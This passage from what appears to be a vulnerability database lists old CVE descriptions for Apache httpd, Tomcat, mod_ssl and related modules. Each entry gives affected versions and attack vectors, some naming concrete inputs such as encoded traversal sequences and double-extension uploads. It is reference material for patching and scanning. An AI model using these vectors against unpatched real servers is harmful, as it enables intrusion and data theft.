5549| [CVE-2005-3745] Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message.
5550| [CVE-2005-3630] Fedora Directory Server before 10 allows remote attackers to obtain sensitive information, such as the password from adm.conf via an IFRAME element, probably involving an Apache httpd.conf configuration that orders "allow" directives before "deny" directives.
5551| [CVE-2005-3510] Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.
| [CVE-2005-3392] Unspecified vulnerability in PHP before 4.4.1, when using the virtual function on Apache 2, allows remote attackers to bypass safe_mode and open_basedir directives.
| [CVE-2005-3357] mod_ssl in Apache 2.0 up to 2.0.55, when configured with an SSL vhost with access control and a custom error 400 error page, allows remote attackers to cause a denial of service (application crash) via a non-SSL request to an SSL port, which triggers a NULL pointer dereference.
| [CVE-2005-3352] Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps.
| [CVE-2005-3319] The apache2handler SAPI (sapi_apache2.c) in the Apache module (mod_php) for PHP 5.x before 5.1.0 final and 4.4 before 4.4.1 final allows attackers to cause a denial of service (segmentation fault) via the session.save_path option in a .htaccess file or VirtualHost.
| [CVE-2005-3164] The AJP connector in Apache Tomcat 4.0.1 through 4.0.6 and 4.1.0 through 4.1.36, as used in Hitachi Cosminexus Application Server and standalone, does not properly handle when a connection is broken before request body data is sent in a POST request, which can lead to an information leak when "unsuitable request body data" is used for a different request, possibly related to Java Servlet pages.
| [CVE-2005-2970] Memory leak in the worker MPM (worker.c) for Apache 2, in certain circumstances, allows remote attackers to cause a denial of service (memory consumption) via aborted connections, which prevents the memory for the transaction pool from being reused for other connections.
| [CVE-2005-2963] The mod_auth_shadow module 1.0 through 1.5 and 2.0 for Apache with AuthShadow enabled uses shadow authentication for all locations that use the require group directive, even when other authentication mechanisms are specified, which might allow remote authenticated users to bypass security restrictions.
| [CVE-2005-2728] The byte-range filter in Apache 2.0 before 2.0.54 allows remote attackers to cause a denial of service (memory consumption) via an HTTP header with a large Range field.
| [CVE-2005-2660] apachetop 0.12.5 and earlier, when running in debug mode, allows local users to create or append to arbitrary files via a symlink attack on atop.debug.
| [CVE-2005-2088] The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
| [CVE-2005-1754] ** DISPUTED ** JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to read arbitrary files via a full pathname in the argument to the Download parameter. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
| [CVE-2005-1753] ** DISPUTED ** ReadMessage.jsp in JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to view other users' e-mail attachments via a direct request to /mailboxesdir/username@domainname. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
| [CVE-2005-1344] Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
| [CVE-2005-1268] Off-by-one error in the mod_ssl Certificate Revocation List (CRL) verification callback in Apache, when configured to use a CRL, allows remote attackers to cause a denial of service (child process crash) via a CRL that causes a buffer overflow of one null byte.
| [CVE-2005-1266] Apache SpamAssassin 3.0.1, 3.0.2, and 3.0.3 allows remote attackers to cause a denial of service (CPU consumption and slowdown) via a message with a long Content-Type header without any boundaries.
| [CVE-2005-0808] Apache Tomcat before 5.x allows remote attackers to cause a denial of service (application crash) via a crafted AJP12 packet to TCP port 8007.
| [CVE-2005-0182] The mod_dosevasive module 1.9 and earlier for Apache creates temporary files with predictable filenames, which could allow remote attackers to overwrite arbitrary files via a symlink attack.
| [CVE-2005-0108] Apache mod_auth_radius 1.5.4 and libpam-radius-auth allow remote malicious RADIUS servers to cause a denial of service (crash) via a RADIUS_REPLY_MESSAGE with a RADIUS attribute length of 1, which leads to a memcpy operation with a -1 length argument.
| [CVE-2004-2734] webadmin-apache.conf in Novell Web Manager of Novell NetWare 6.5 uses an uppercase Alias tag with an inconsistent lowercase directory tag for a volume, which allows remote attackers to bypass access control to the WEB-INF folder.
| [CVE-2004-2680] mod_python (libapache2-mod-python) 3.1.4 and earlier does not properly handle when output filters process more than 16384 bytes, which can cause filter.read to return portions of previously freed memory.
| [CVE-2004-2650] Spooler in Apache Foundation James 2.2.0 allows local users to cause a denial of service (memory consumption) by triggering various error conditions in the retrieve function, which prevents a lock from being released and causes a memory leak.
| [CVE-2004-2343] ** DISPUTED ** Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument.
| [CVE-2004-2336] Unknown vulnerability in Novell GroupWise and GroupWise WebAccess 6.0 through 6.5, when running with Apache Web Server 1.3 for NetWare where Apache is loaded using GWAPACHE.CONF, allows remote attackers to read directories and files on the server.
| [CVE-2004-2115] Multiple cross-site scripting (XSS) vulnerabilities in Oracle HTTP Server 1.3.22, based on Apache, allow remote attackers to execute arbitrary script as other users via the (1) action, (2) username, or (3) password parameters in an isqlplus request.
| [CVE-2004-1834] mod_disk_cache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information.
| [CVE-2004-1765] Off-by-one buffer overflow in ModSecurity (mod_security) 1.7.4 for Apache 2.x, when SecFilterScanPost is enabled, allows remote attackers to execute arbitrary code via crafted POST requests.
| [CVE-2004-1545] UploadFile.php in MoniWiki 1.0.9.2 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.hwp, which allows remote attackers to upload and execute arbitrary code.
| [CVE-2004-1438] The mod_authz_svn Apache module for Subversion 1.0.4-r1 and earlier allows remote authenticated users, with write access to the repository, to read unauthorized parts of the repository via the svn copy command.
| [CVE-2004-1405] MediaWiki 1.3.8 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
| [CVE-2004-1404] Attachment Mod 2.3.10 module for phpBB, when used with Apache mod_mime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
| [CVE-2004-1387] The check_forensic script in apache-utils package 1.3.31 allows local users to overwrite or create arbitrary files via a symlink attack on temporary files.
| [CVE-2004-1084] Apache for Apple Mac OS X 10.2.8 and 10.3.6 allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+, which bypass Apache file handles.
| [CVE-2004-1083] Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with ".ht" using alternate capitalization.
| [CVE-2004-1082] mod_digest_apple for Apache 1.3.31 and 1.3.32 on Mac OS X Server does not properly verify the nonce of a client response, which allows remote attackers to replay credentials.
| [CVE-2004-0942] Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.
| [CVE-2004-0940] Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.
| [CVE-2004-0885] The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.
| [CVE-2004-0811] Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration.
| [CVE-2004-0809] The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access.
| [CVE-2004-0786] The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool.
| [CVE-2004-0751] The char_buffer_read function in the mod_ssl module for Apache 2.x, when using reverse proxying to an SSL server, allows remote attackers to cause a denial of service (segmentation fault).
| [CVE-2004-0748] mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop.
| [CVE-2004-0747] Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.
| [CVE-2004-0700] Format string vulnerability in the mod_proxy hook functions function in ssl_engine_log.c in mod_ssl before 2.8.19 for Apache before 1.3.31 may allow remote attackers to execute arbitrary messages via format string specifiers in certain log messages for HTTPS that are handled by the ssl_log function.
| [CVE-2004-0646] Buffer overflow in the WriteToLog function for JRun 3.0 through 4.0 web server connectors, such as (1) mod_jrun and (2) mod_jrun20 for Apache, with verbose logging enabled, allows remote attackers to execute arbitrary code via a long HTTP header Content-Type field or other fields.
| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
| [CVE-2004-0493] The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.
| [CVE-2004-0492] Heap-based buffer overflow in proxy_util.c for mod_proxy in Apache 1.3.25 to 1.3.31 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via a negative Content-Length HTTP header field, which causes a large amount of data to be copied.
| [CVE-2004-0490] cPanel, when compiling Apache 1.3.29 and PHP with the mod_phpsuexec option, does not set the --enable-discard-path option, which causes php to use the SCRIPT_FILENAME variable to find and execute a script instead of the PATH_TRANSLATED variable, which allows local users to execute arbitrary PHP code as other users via a URL that references the attacker's script after the user's script, which executes the attacker's script with the user's privileges, a different vulnerability than CVE-2004-0529.
| [CVE-2004-0488] Stack-based buffer overflow in the ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl, when mod_ssl is configured to trust the issuing CA, may allow remote attackers to execute arbitrary code via a client certificate with a long subject DN.
| [CVE-2004-0263] PHP 4.3.4 and earlier in Apache 1.x and 2.x (mod_php) can leak global variables between virtual hosts that are handled by the same Apache child process but have different settings, which could allow remote attackers to obtain sensitive information.
| [CVE-2004-0174] Apache 1.4.x before 1.3.30, and 2.0.x before 2.0.49, when using multiple listening sockets on certain platforms, allows remote attackers to cause a denial of service (blocked new connections) via a "short-lived connection on a rarely-accessed listening socket."
| [CVE-2004-0173] Directory traversal vulnerability in Apache 1.3.29 and earlier, and Apache 2.0.48 and earlier, when running on Cygwin, allows remote attackers to read arbitrary files via a URL containing "..%5C" (dot dot encoded backslash) sequences.
| [CVE-2004-0113] Memory leak in ssl_engine_io.c for mod_ssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service (memory consumption) via plain HTTP requests to the SSL port of an SSL-enabled server.
| [CVE-2004-0009] Apache-SSL 1.3.28+1.52 and earlier, with SSLVerifyClient set to 1 or 3 and SSLFakeBasicAuth enabled, allows remote attackers to forge a client certificate by using basic authentication with the "one-line DN" of the target user.
| [CVE-2003-1581] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
| [CVE-2003-1580] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
| [CVE-2003-1573] The PointBase 4.6 database component in the J2EE 1.4 reference implementation (J2EE/RI) allows remote attackers to execute arbitrary programs, conduct a denial of service, and obtain sensitive information via a crafted SQL statement, related to "inadequate security settings and library bugs in sun.* and org.apache.* packages."
| [CVE-2003-1521] Sun Java Plug-In 1.4 through 1.4.2_02 allows remote attackers to repeatedly access the floppy drive via the createXmlDocument method in the org.apache.crimson.tree.XmlDocument class, which violates the Java security model.
| [CVE-2003-1516] The org.apache.xalan.processor.XSLProcessorVersion class in Java Plug-in 1.4.2_01 allows signed and unsigned applets to share variables, which violates the Java security model and could allow remote attackers to read or write data belonging to a signed applet.
| [CVE-2003-1502] mod_throttle 3.0 allows local users with Apache privileges to access shared memory that points to a file that is writable by the apache user, which could allow local users to gain privileges.
| [CVE-2003-1418] Apache HTTP Server 1.3.22 through 1.3.27 on OpenBSD allows remote attackers to obtain sensitive information via (1) the ETag header, which reveals the inode number, or (2) multipart MIME boundary, which reveals child proccess IDs (PID).
| [CVE-2003-1307] ** DISPUTED ** The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP."
| [CVE-2003-1172] Directory traversal vulnerability in the view-source sample file in Apache Software Foundation Cocoon 2.1 and 2.2 allows remote attackers to access arbitrary files via a .. (dot dot) in the filename parameter.
| [CVE-2003-1171] Heap-based buffer overflow in the sec_filter_out function in mod_security 1.7RC1 through 1.7.1 in Apache 2 allows remote attackers to execute arbitrary code via a server side script that sends a large amount of data.
| [CVE-2003-1138] The default configuration of Apache 2.0.40, as shipped with Red Hat Linux 9.0, allows remote attackers to list directory contents, even if auto indexing is turned off and there is a default web page configured, via a GET request containing a double slash (//).
| [CVE-2003-1054] mod_access_referer 1.0.2 allows remote attackers to cause a denial of service (crash) via a malformed Referer header that is missing a hostname, as parsed by the ap_parse_uri_components function in Apache, which triggers a null dereference.
| [CVE-2003-0993] mod_access in Apache 1.3 before 1.3.30, when running big-endian 64-bit platforms, does not properly parse Allow/Deny rules using IP addresses without a netmask, which could allow remote attackers to bypass intended access restrictions.
| [CVE-2003-0987] mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response by using a AuthNonce secret.
| [CVE-2003-0866] The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.
| [CVE-2003-0844] mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled.
| [CVE-2003-0843] Format string vulnerability in mod_gzip_printf for mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode and using the Apache log, allows remote attackers to execute arbitrary code via format string characters in an HTTP GET request with an "Accept-Encoding: gzip" header.
| [CVE-2003-0789] mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not properly handle CGI redirect paths, which could cause Apache to send the output of a CGI program to the wrong client.
| [CVE-2003-0771] Gallery.pm in Apache::Gallery (aka A::G) uses predictable temporary filenames when running Inline::C, which allows local users to execute arbitrary code by creating and modifying the files before Apache::Gallery does.
| [CVE-2003-0658] Docview before 1.1-18 in Caldera OpenLinux 3.1.1, SCO Linux 4.0, OpenServer 5.0.7, configures the Apache web server in a way that allows remote attackers to read arbitrary publicly readable files via a certain URL, possibly related to rewrite rules.
| [CVE-2003-0542] Multiple stack-based buffer overflows in (1) mod_alias and (2) mod_rewrite for Apache before 1.3.29 allow attackers to create configuration files to cause a denial of service (crash) or execute arbitrary code via a regular expression with more than 9 captures.
| [CVE-2003-0460] The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service.
| [CVE-2003-0254] Apache 2 before 2.0.47, when running on an IPv6 host, allows attackers to cause a denial of service (CPU consumption by infinite loop) when the FTP proxy server fails to create an IPv6 socket.
| [CVE-2003-0253] The prefork MPM in Apache 2 before 2.0.47 does not properly handle certain errors from accept, which could lead to a denial of service.
| [CVE-2003-0249] ** DISPUTED ** PHP treats unknown methods such as "PoSt" as a GET request, which could allow attackers to intended access restrictions if PHP is running on a server that passes on all methods, such as Apache httpd 2.0, as demonstrated using a Limit directive. NOTE: this issue has been disputed by the Apache security team, saying "It is by design that PHP allows scripts to process any request method. A script which does not explicitly verify the request method will hence be processed as normal for arbitrary methods. It is therefore expected behaviour that one cannot implement per-method access control using the Apache configuration alone, which is the assumption made in this report."
| [CVE-2003-0245] Vulnerability in the apr_psprintf function in the Apache Portable Runtime (APR) library for Apache 2.0.37 through 2.0.45 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly other vectors.
| [CVE-2003-0192] Apache 2 before 2.0.47, and certain versions of mod_ssl for Apache 1.3, do not properly handle "certain sequences of per-directory renegotiations and the SSLCipherSuite directive being used to upgrade from a weak ciphersuite to a strong one," which could cause Apache to use the weak ciphersuite.
| [CVE-2003-0189] The authentication module for Apache 2.0.40 through 2.0.45 on Unix does not properly handle threads safely when using the crypt_r or crypt functions, which allows remote attackers to cause a denial of service (failed Basic authentication with valid usernames and passwords) when a threaded MPM is used.
| [CVE-2003-0134] Unknown vulnerability in filestat.c for Apache running on OS2, versions 2.0 through 2.0.45, allows unknown attackers to cause a denial of service via requests related to device names.
| [CVE-2003-0132] A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.
| [CVE-2003-0083] Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 does not filter terminal escape sequences from its access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.
| [CVE-2003-0020] Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.
| [CVE-2003-0017] Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served.
| [CVE-2003-0016] Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names.
| [CVE-2002-2310] ClickCartPro 4.0 stores the admin_user.db data file under the web document root with insufficient access control on servers other than Apache, which allows remote attackers to obtain usernames and passwords.
| [CVE-2002-2309] php.exe in PHP 3.0 through 4.2.2, when running on Apache, does not terminate properly, which allows remote attackers to cause a denial of service via a direct request without arguments.
| [CVE-2002-2272] Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.
| [CVE-2002-2103] Apache before 1.3.24, when writing to the log file, records a spoofed hostname from the reverse lookup of an IP address, even when a double-reverse lookup fails, which allows remote attackers to hide the original source of activities.
| [CVE-2002-2029] PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string.
| [CVE-2002-2012] Unknown vulnerability in Apache 1.3.19 running on HP Secure OS for Linux 1.0 allows remote attackers to cause "unexpected results" via an HTTP request.
| [CVE-2002-2009] Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message.
| [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.
| [CVE-2002-2007] The default installations of Apache Tomcat 3.2.3 and 3.2.4 allows remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages.
| [CVE-2002-2006] The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.
| [CVE-2002-1895] The servlet engine in Jakarta Apache Tomcat 3.3 and 4.0.4, when using IIS and the ajp1.3 connector, allows remote attackers to cause a denial of service (crash) via a large number of HTTP GET requests for an MS-DOS device such as AUX, LPT1, CON, or PRN.
| [CVE-2002-1850] mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.
| [CVE-2002-1793] HTTP Server mod_ssl module running on HP-UX 11.04 with Virtualvault OS (VVOS) 4.5 through 4.6 closes the connection when the Apache server times out during an SSL request, which may allow attackers to cause a denial of service.
| [CVE-2002-1658] Buffer overflow in htdigest in Apache 1.3.26 and 1.3.27 may allow attackers to execute arbitrary code via a long user argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
| [CVE-2002-1635] The Apache configuration file (httpd.conf) in Oracle 9i Application Server (9iAS) uses a Location alias for /perl directory instead of a ScriptAlias, which allows remote attackers to read the source code of arbitrary CGI files via a URL containing the /perl directory instead of /cgi-bin.
| [CVE-2002-1593] mod_dav in Apache before 2.0.42 does not properly handle versioning hooks, which may allow remote attackers to kill a child process via a null dereference and cause a denial of service (CPU consumption) in a preforked multi-processing module.
| [CVE-2002-1592] The ap_log_rerror function in Apache 2.0 through 2.035, when a CGI application encounters an error, sends error messages to the client that include the full path for the server, which allows remote attackers to obtain sensitive information.
| [CVE-2002-1567] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1 allows remote attackers to execute arbitrary web script and steal cookies via a URL with encoded newlines followed by a request to a .jsp file whose name contains the script.
| [CVE-2002-1394] Apache Tomcat 4.0.5 and earlier, when using both the invoker servlet and the default servlet, allows remote attackers to read source code for server files or bypass certain protections, a variant of CAN-2002-1148.
| [CVE-2002-1233] A regression error in the Debian distributions of the apache-ssl package (before 1.3.9 on Debian 2.2, and before 1.3.26 on Debian 3.0), for Apache 1.3.27 and earlier, allows local users to read or modify the Apache password file via a symlink attack on temporary files when the administrator runs (1) htpasswd or (2) htdigest, a re-introduction of a vulnerability that was originally identified and addressed by CVE-2001-0131.
| [CVE-2002-1157] Cross-site scripting vulnerability in the mod_ssl Apache module 2.8.9 and earlier, when UseCanonicalName is off and wildcard DNS is enabled, allows remote attackers to execute script as other web site visitors, via the server name in an HTTPS response on the SSL port, which is used in a self-referencing URL, a different vulnerability than CAN-2002-0840.
| [CVE-2002-1156] Apache 2.0.42 allows remote attackers to view the source code of a CGI script via a POST request to a directory with both WebDAV and CGI enabled.
| [CVE-2002-1148] The default servlet (org.apache.catalina.servlets.DefaultServlet) in Tomcat 4.0.4 and 4.1.10 and earlier allows remote attackers to read source code for server files via a direct request to the servlet.
| [CVE-2002-0935] Apache Tomcat 4.0.3, and possibly other versions before 4.1.3 beta, allows remote attackers to cause a denial of service (resource exhaustion) via a large number of requests to the server with null characters, which causes the working threads to hang.
| [CVE-2002-0843] Buffer overflows in the ApacheBench benchmark support program (ab.c) in Apache before 1.3.27, and Apache 2.x before 2.0.43, allow a malicious web server to cause a denial of service and possibly execute arbitrary code via a long response.
| [CVE-2002-0840] Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header, a different vulnerability than CAN-2002-1157.
| [CVE-2002-0839] The shared memory scoreboard in the HTTP daemon for Apache 1.3.x before 1.3.27 allows any user running as the Apache UID to send a SIGUSR1 signal to any process as root, resulting in a denial of service (process kill) or possibly other behaviors that would not normally be allowed, by modifying the parent[].pid and parent[].last_rtime segments in the scoreboard.
| [CVE-2002-0682] Cross-site scripting vulnerability in Apache Tomcat 4.0.3 allows remote attackers to execute script as other web users via script in a URL with the /servlet/ mapping, which does not filter the script when an exception is thrown by the servlet.
| [CVE-2002-0661] Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters.
| [CVE-2002-0658] OSSP mm library (libmm) before 1.2.0 allows the local Apache user to gain privileges via temporary files, possibly via a symbolic link attack.
| [CVE-2002-0654] Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked.
| [CVE-2002-0653] Off-by-one buffer overflow in the ssl_compat_directive function, as called by the rewrite_command hook for mod_ssl Apache module 2.8.9 and earlier, allows local users to execute arbitrary code as the Apache server user via .htaccess files with long entries.
| [CVE-2002-0513] The PHP administration script in popper_mod 1.2.1 and earlier relies on Apache .htaccess authentication, which allows remote attackers to gain privileges if the script is not appropriately configured by the administrator.
| [CVE-2002-0493] Apache Tomcat may be started without proper security settings if errors are encountered while reading the web.xml file, which could allow attackers to bypass intended restrictions.
| [CVE-2002-0392] Apache 1.3 through 1.3.24, and Apache 2.0 through 2.0.36, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a chunk-encoded HTTP request that causes Apache to use an incorrect size.
| [CVE-2002-0259] InstantServers MiniPortal 1.1.5 and earlier stores sensitive login and account data in plaintext in (1) .pwd files in the miniportal/apache directory, or (2) mplog.txt, which could allow local users to gain privileges.
| [CVE-2002-0249] PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message.
| [CVE-2002-0240] PHP, when installed with Apache and configured to search for index.php as a default web page, allows remote attackers to obtain the full pathname of the server via the HTTP OPTIONS method, which reveals the pathname in the resulting error message.
| [CVE-2002-0082] The dbm and shm session cache code in mod_ssl before 2.8.7-1.3.23, and Apache-SSL before 1.3.22+1.46, does not properly initialize memory using the i2d_SSL_SESSION function, which allows remote attackers to use a buffer overflow to execute arbitrary code via a large client certificate that is signed by a trusted Certificate Authority (CA), which produces a large serialized session.
| [CVE-2002-0061] Apache for Win32 before 1.3.24, and 2.0.x before 2.0.34-beta, allows remote attackers to execute arbitrary commands via shell metacharacters (a | pipe character) provided as arguments to batch (.bat) or .cmd scripts, which are sent unfiltered to the shell interpreter, typically cmd.exe.
| [CVE-2001-1556] The log files in Apache web server contain information directly supplied by clients and does not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep.
5681| [CVE-2001-1556] The log files in Apache web server contain information directly supplied by clients and do not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep.
5682| [CVE-2001-1534] mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication.
5683| [CVE-2001-1510] Allaire JRun 2.3.3, 3.0 and 3.1 running on IIS 4.0 and 5.0, iPlanet, Apache, JRun web server (JWS), and possibly other web servers allows remote attackers to read arbitrary files and directories by appending (1) "%3f.jsp", (2) "?.jsp" or (3) "?" to the requested URL.
5684| [CVE-2001-1449] The default installation of Apache before 1.3.19 on Mandrake Linux 7.1 through 8.0 and Linux Corporate Server 1.0.1 allows remote attackers to list the directory index of arbitrary web directories.
5685| [CVE-2001-1385] The Apache module for PHP 4.0.0 through PHP 4.0.4, when disabled with the 'engine = off' option for a virtual host, may disable PHP for other virtual hosts, which could cause Apache to serve the source code of PHP scripts.
5686| [CVE-2001-1342] Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer.
5687| [CVE-2001-1217] Directory traversal vulnerability in PL/SQL Apache module in Oracle 9i Application Server allows remote attackers to access sensitive information via a double encoded URL with .. (dot dot) sequences.
5688| [CVE-2001-1216] Buffer overflow in PL/SQL Apache module in Oracle 9i Application Server allows remote attackers to execute arbitrary code via a long request for a help page.
5689| [CVE-2001-1072] Apache with mod_rewrite enabled on most UNIX systems allows remote attackers to bypass RewriteRules by inserting extra / (slash) characters into the requested path, which causes the regular expression in the RewriteRule to fail.
5690| [CVE-2001-1013] Apache on Red Hat Linux with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.
